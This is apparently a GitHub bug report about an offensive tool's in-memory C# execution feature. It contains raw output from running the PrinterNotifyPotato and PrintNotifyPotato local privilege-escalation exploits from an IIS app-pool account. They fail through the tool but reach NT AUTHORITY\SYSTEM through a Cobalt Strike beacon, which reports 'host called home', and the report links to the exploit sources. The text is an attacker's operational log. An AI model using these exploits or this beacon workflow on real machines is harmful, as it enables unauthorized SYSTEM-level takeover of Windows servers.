[BUG] Problem with in-memory execution of C# executable EXP #223

@kokxxoo

文件 : PrinterNotifyPotato.exe
命令行参数 : whoami
等待时间(秒) : 10
结束进程 : True
exe执行完成,输出信息:
Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse).
Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: IIS APPPOOL\123
[x] CoCreateInstance fail with HRESULT: 0x80070005
ExecuteSharp end

文件 : PrintNotifyPotato.exe
命令行参数 : whoami
等待时间(秒) : 10
结束进程 : True
exe执行完成,输出信息:
[!] Cannot CoInitializeSecurity hr = -2147417831
[!] Cannot CreateInstance PrintNotify hr = -2147024891
ExecuteSharp end

Below is the same thing run through CS, which works normally:
[*] Tasked beacon to run .NET program: PrintNotifyPotato.exe whoami
[+] host called home, sent: 131864 bytes
[+] received output:
[*] Create PrintNotify Success!
[*] Create FakeIUnknown Success!
[*] CreatePointerMoniker Success!
[*] Trigger......
[*] Got Token: 0x49c
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] DuplicateTokenEx Success! PrimaryToken: 0x1162
[*] process start with pid 38374
nt authority\system

[*] Tasked beacon to run .NET program: PrinterNotifyPotato.exe whoami
[+] host called home, sent: 119560 bytes
[+] received output:
Exploit for PrinterNotify Service DCOM Object local privalege escalation vulnerability(by SeImpersonatePrivilege abuse).
Part of GMH's fuck Tools, Code By zcgonvh.

[+] Current user: IIS APPPOOL\123
[+] Get Token: 1284
[!] process with pid: 45324 created.

nt authority\system

————————————————————————————————————————
https://github.com/zcgonvh/DCOMPotato/blob/master/PrinterNotifyPotato.cs
https://github.com/BeichenDream/PrintNotifyPotato
